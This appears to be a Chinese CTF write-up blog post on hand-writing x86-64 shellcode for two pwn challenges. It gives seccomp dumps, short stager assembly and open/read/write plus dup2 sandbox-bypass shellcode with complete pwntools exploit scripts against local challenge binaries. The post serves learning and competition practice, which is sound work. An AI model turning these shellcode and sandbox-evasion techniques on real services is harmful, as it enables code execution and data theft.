how2手写shellcode

最新推荐文章于 2024-07-09 14:05:08 发布
最新推荐文章于 2024-07-09 14:05:08 发布
阅读量76 收藏
点赞数
文章标签: 数据库 python github 网络安全 phpstorm jupyter postman
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y7472821/article/details/133925343
版权
本文详细介绍了如何在限制条件下手写shellcode,包括使用asm指令,避开沙箱限制,以及动态调试策略,以实现对程序的控制和获取flag。
摘要由CSDN通过智能技术生成

how2手写shellcode

羊城杯shellcode怎么写都绕不过,痛定思痛决定好好学一下怎么手写shellcode

本文通过例题介绍一下如何手写shellcode来实现我们想要的功能,对于使用工具主动生成shellcode就不再赘述

hgame2023-simple_shellcode

保护全开,沙箱禁system
在这里插入图片描述在这里插入图片描述在这里插入图片描述

存在可写可执行段,可以构造shellcode送入此处,但read只能读入0x10大小
在这里插入图片描述

由于程序只执行一次,且可利用空间较小无法构造orw,所以构造read(0,0xcafe0000,0x1000)

下面再读入构造的orw
在这里插入图片描述

sc = asm(‘’’
xor eax, eax
xor edi, edi
mov edx, 0x1000
mov esi, 0xcafe0000
syscall
‘’')
#syscall(0,0,0xcafe0000,0x1000)
在这里插入图片描述

exp:
#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
import base64
#from ae64 import AE64
#from LibcSearcher import *

context.os = ‘linux’
context.arch = ‘amd64’
#context.arch = ‘i386’
context.log_level = “debug”

name = ‘./vuln’

debug = 0
if debug:
p = remote(‘127.0.0.1’,9999)
else:
p = process(name)

#libcso = ‘/lib/x86_64-linux-gnu/libc.so.6’
libcso = ‘./libc-2.31.so’
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)

s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data,num :u32(p.recvuntil(data)[-num:].ljust(4,b’\x00’))
uu64 = lambda data,num :u64(p.recvuntil(data)[-num:].ljust(8,b’\x00’))
leak = lambda name,addr :log.success(‘{} = {:#x}’.format(name, addr))
l64 = lambda :u64(p.recvuntil(“\x7f”)[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil(“\xf7”)[-4:].ljust(4,b"\x00"))
li = lambda x : print(‘\x1b[01;38;5;214m’ + x + ‘\x1b[0m’)
ll = lambda x : print(‘\x1b[01;38;5;1m’ + x + ‘\x1b[0m’)
context.terminal = [‘gnome-terminal’,‘-x’,‘sh’,‘-c’]

def dbg():
gdb.attach(proc.pidof§[0])
pause()

sc = asm(‘’’
xor eax, eax
xor edi, edi
mov edx, 0x1000
mov esi, 0xcafe0000
syscall
‘’')
ru(b"shellcode:")
dbg()
s(sc)

shellcode = b"\x90" * 0x100
shellcode += asm(shellcraft.open(“/flag”))
shellcode += asm(shellcraft.read(3, 0xCAFE0500, 0x500))
shellcode += asm(shellcraft.write(1, 0xCAFE0500, 0x500))

p.send(shellcode)

itr()

羊城杯2023-shellcode

静态分析:
在这里插入图片描述

主函数:
在这里插入图片描述

进入分支

在这里插入图片描述

程序对读入的内容进行限制,要求输入字符十六进制ascii码在0x79-0x95​之间,即OPQRSTUVWXYZ[]^_​

在这里插入图片描述

同时检查 v4​ 相对于 s​ 数组的偏移是否等于16字节,不过可以多写一位,即输入内容限制在17字节大小
在这里插入图片描述

我们可以看到启动沙箱后会去执行我们写入的内容
在这里插入图片描述

0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x12 0xc000003e if (A != ARCH_X86_64) goto 0020
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x0f 0xffffffff if (A != 0xffffffff) goto 0020
0005: 0x15 0x0d 0x00 0x00000002 if (A == open) goto 0019
0006: 0x15 0x0c 0x00 0x00000021 if (A == dup2) goto 0019
0007: 0x15 0x00 0x05 0x00000000 if (A != read) goto 0013
0008: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count)
0009: 0x25 0x0a 0x00 0x00000000 if (A > 0x0) goto 0020
0010: 0x15 0x00 0x08 0x00000000 if (A != 0x0) goto 0019
0011: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count)
0012: 0x25 0x07 0x06 0x00000002 if (A > 0x2) goto 0020 else goto 0019
0013: 0x15 0x00 0x06 0x00000001 if (A != write) goto 0020
0014: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # write(fd, buf, count)
0015: 0x25 0x03 0x00 0x00000000 if (A > 0x0) goto 0019
0016: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0020
0017: 0x20 0x00 0x00 0x00000010 A = fd # write(fd, buf, count)
0018: 0x25 0x00 0x01 0x00000002 if (A <= 0x2) goto 0020
0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0020: 0x06 0x00 0x00 0x00000000 return KILL
stack段可写可执行,但对shellcode的限制相当大

在这里插入图片描述

首先要绕过if判断,17字节大小内的shellcode显然不够,我们还需要进一步续写shellcode并能绕过沙箱去读到flag

动态调试:
ru(b’[2] Input: (ye / no)\n’)
s(asm(‘syscall’))
在这里插入图片描述

绕过if判断进入分支同时写入syscall

在这里插入图片描述在这里插入图片描述

编写shellcode设置寄存器,构造一次read,利用传入的syscall(x05x0f)作为read的rdx参数

最终构造好syscall(0,0,syscall_addr,0x50f)全部参数后跳转到syscall地址处进行系统调用来续写,并继续执行

push rbx #rsp 0;start_addr-0x8 (start0x2478)
pop rax #1 rax 0;start_addr
pop rsi #+8
pop rsi #+8

pop rsi #2 三次pop赋rsi start+0x68 <- 0x50f;start_addr+0x18
push rax #rsp 0;start_addr+0x10
pop rdi #3 rdi 0
pop rdx #+8

push rsi #rsp start+0x68 <- 0x50f;start_addr+0x18
pop rsp #rsp start+0x68 <- 0x50f;start+0x68
pop rdx #4 rdx 0x50f
push rdx #start+0x68

push rsi #start+0x68-0x8
push rax #-8
pop rax #+8
push rsi #rsp start+0x68<-0x50f;start+0x68-0x10

ret #start+0x68 syscall

#syscall(0,0,start+0x68,0x50f)
绕过沙箱orw+dup2:
sc1 = asm(‘’’
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 0x2
pop rax
syscall
mov rax,0x21
mov rdi,0x3
mov rsi,0x2
syscall
xor rax,rax
mov rsi,rsp
push 0x2
pop rdi
mov rdx,0x30
syscall
mov rax,0x21
mov rdi,0x1
mov rsi,0x5
syscall
mov rax,0x1
mov rsi,rsp
mov rdi,0x5
syscall
‘’‘)
s(b’aa’+sc1)
补两字节对齐
在这里插入图片描述

open(‘flag’)
在这里插入图片描述

dup2(3,2)
在这里插入图片描述

read(2,‘flag’,0x30)

在这里插入图片描述

dup2(1,5)

在这里插入图片描述

write(5,start+0x58,0x30)

exp:

encoding = utf-8

from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
import base64

from ae64 import AE64

from LibcSearcher import *

context.os = ‘linux’
context.arch = ‘amd64’

context.arch = ‘i386’

context.log_level = “debug”

name = ‘./pwn’

debug = 0
if debug:
p = remote(‘127.0.0.1’,8000)
else:
p = process(name)

libcso = ‘/lib/x86_64-linux-gnu/libc.so.6’
#libcso = ‘./libc-2.31.so’
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)

s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data,num :u32(p.recvuntil(data)[-num:].ljust(4,b’\x00’))
uu64 = lambda data,num :u64(p.recvuntil(data)[-num:].ljust(8,b’\x00’))
leak = lambda name,addr :log.success(‘{} = {:#x}’.format(name, addr))
l64 = lambda :u64(p.recvuntil(“\x7f”)[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil(“\xf7”)[-4:].ljust(4,b"\x00"))

context.terminal = [‘gnome-terminal’,‘-x’,‘sh’,‘-c’]

def dbg():
gdb.attach(proc.pidof§[0])
pause()

ru(b’[2] Input: (ye / no)\n’)
s(asm(‘syscall’))

ru(b’======\n’)

sc0=asm(‘’’
push rbx
pop rax
pop rsi
pop rsi
pop rsi
push rax
pop rdi
pop rdx
push rsi
pop rsp
pop rdx
push rdx
push rsi
push rax
pop rax
push rsi
ret
‘’')
#dbg()
s(sc0)

sc1 = asm(‘’’
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 0x2
pop rax
syscall
mov rax,0x21
mov rdi,0x3
mov rsi,0x2
syscall
xor rax,rax
mov rsi,rsp
push 0x2
pop rdi
mov rdx,0x30
syscall
mov rax,0x21
mov rdi,0x1
mov rsi,0x5
syscall
mov rax,0x1
mov rsi,rsp
mov rdi,0x5
syscall
‘’‘)
pause()
s(b’aa’+sc1)

itr()

在这里插入图片描述

小言同学喜欢挖漏洞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shellcode的学习记录
weixin_44864859的博客
07-24 421
虽然我们可以利用pwntools自动生成shellcode,也可以利用alpha生成纯字符的shellcode绕过某些限制,但是当程序对输入限制较为严苛时,就不得不和这些自动化工具说再见了。由于之前完全没有shellcode的经验,所以本文主要是理解分析其他师傅的shellcode,尝试从中获得技巧和方法(说得明白点就先从照葫芦画瓢开始。。。) 首先直接来看题,这是2020 NUAA CTF的一道题,主要考点是ascii shellcode,难点在于限制只能用0x1f-0x7f的字符,并且buf长度只有
linux上的shellcode法(pwntools,shell)
逆向萌新的博客
07-16 3107
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
shellcode入门_编解析器入门
weixin_26705651的博客
09-24 265
shellcode入门This article discusses a simple approach to implement a handwritten parser from scratch and some fundamentals associated with it. This focuses more on explaining the practical aspects of ...
教你纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5223
ascii shellcode : 自动生成shellcodeshellcode
关于如何编 Clean Code 的 6 个简单技巧
weixin_34320159的博客
11-18 153
作者:Alex Devero 翻译:承香墨影 编简洁代码(Clean Code)不是一件非常容易的事情,为了保持代码整洁,你需要尝试不同的技巧和做法。问题是,在这个问题上,有太多的做法和技巧,是需要大量的重构的。因此,开发者很难选择出适合自己项目的做法和技巧。 让我们来简化这个任务,在本文中,我们将讨论编整洁代码的一些好处,然后再来...
BUAACTF 2021校赛
weixin_44008345的博客
05-23 3356
Write up by Picasso Misc luansha 下载gif打开看就知道了,flag是 flag{H@ppy_m1sc} Minecraft 在Minecraft中打开地图,发现电路是实现一个按bit的vernam密码,记录下每一位的密文,key循环使用,它还说key可能有一个起始偏移,枚举一下,解密得到flag,exp如下: #include<stdio.h> int main() { int m,c,sum=0; char key[20]="10010110
[漏洞分析] 栈基础 & 栈溢出 & 栈溢出进阶
Poo_Chai的博客
10-27 1289
[漏洞分析]栈基础 & 栈溢出 & 栈溢出进阶 栈基础 内存四区 代码区(.text):这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指令执行。 数据区(.data):用于存储全局变量和静态变量等。 堆区:动态地分配和回收内存,进程可以在堆区动态地请求一定大小的内存,并在用...
在互联网上,没有人知道你是一条狗?
热门推荐
信息安全-企业安全-数据安全
08-22 3万+
1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着键盘。它望向站在地上、表情迷茫的另一只狗,兴奋地说:「在互联网上,没人知道你是一条狗。 (On the Internet, nobody knows you’re a dog.)画中那只狗的台词随即成了 IT 界广为流传的经典笑话。 那个
MemLoad2Shellcode.rar
06-30
总结,"MemLoad2Shellcode"是一个强大的Shellcode开发框架,它的内存加载功能和对两种主流架构的支持,使得开发和调试Shellcode变得更加高效。然而,由于其潜在的滥用风险,对于安全研究人员来说,理解并掌握这些...
alpha2 shellcode解密的vbs脚本
09-06
这里的“alpha2 shellcode解密的vbs脚本”指的是一个VBScript脚本,它的目的是对特定形式的Alpha2加密壳进行解密,从而提取出隐藏的下载URL,这个URL通常指向一个可执行文件(exe)。 解密过程主要分为以下几个步骤...
Custom Shellcode
05-16
Custom Shellcode 代码参考.
shellcode转为2进制,比如shell[]="\xXX"此种形式的文件将字符\xXX转换为2进制文件
07-08
2. **生成字节流**:将解析得到的字节存储在一个字节数组或缓冲区中。这一步骤可能涉及到创建一个新的数组,然后遍历字符串并填充字节。 3. **入文件**:将字节数组的内容入到二进制文件中。可以使用`fwrite()`...
shellcode2exe for js
01-04
Shellcode2exe for Js是一款工具,它允许用户将JavaScript(JS)编Shellcode转换为可执行(EXE)文件。Shellcode是一种低级代码片段,通常用于利用计算机软件中的漏洞,它可以直接在内存中执行,而无需通过磁盘...
初始C++
2302_81016149的博客
07-08 780
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
JDBC (基础)
weixin_51644244的博客
07-07 385
思考: java和sql是两种不同的编程语言。翻译程序---每个数据库厂商都提高了翻译软件-- -打包jar。---我们的java代码引入jar就可完成与数据库的沟通。Java :OOP 面向对象的编程对象。SQL: 结构化查询语言。
系统架构设计师教程 第二章 计算机系统基础知识-2.3计算机软件
Remon的专栏
07-09 708
《系统架构设计师教程》清华第二版 2.3计算机软件 章节的详细解读
Java:使用synchronized和Redis实现并发控制的区别
好幸运
07-08 436
而Redis则适用于分布式环境下的同步需求,虽然操作相对复杂,但它能够解决跨JVM的资源竞争问题。: 是Java语言内置的关键字,用于实现线程间的同步。这种同步是** JVM层面**的,对本地内存中的对象进行操作。Redis: 由于是基于网络通信的分布式存储,它的性能受到网络延迟和带宽的影响。然而,在分布式环境下,Redis提供的分布式锁机制能够有效解决跨JVM的同步问题,尽管相比。Redis: 使用Redis实现同步(如通过SETNX命令设置锁),需要动编代码来获取和释放锁。
CH-benCHmark:一个HTAP数据库测试基准
最新发布
算力测评
07-09 248
这一基准测试,旨在弥合TPC-C(专注于联机事务处理,即OLTP)与TPC-H(侧重于联机分析处理,即OLAP)这两项业界权威但单一的工作负载测试之间的鸿沟。它巧妙地结合了TPC-C的订单录入流程产生的交易负载,以及与之对应的、等同于TPC-H级别的OLAP查询套件,并在单一数据库系统内的同一数据集上并行执行。正因为继承自两个最广泛应用的TPC标准,CH-benCHmark的测试结果不仅对混合负载系统具有重大参考价值,同时也适用于传统的单一工作负载场景。
ret2shellcode
03-17
ret2shellcode 是一种攻击技术,通常用于在计算机系统中绕过安全防护机制,执行恶意操作。这种技术通过利用程序中的缓冲区溢出漏洞,在返回到函数的返回地址处插入恶意代码,来达到控制程序流程并执行恶意操作的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值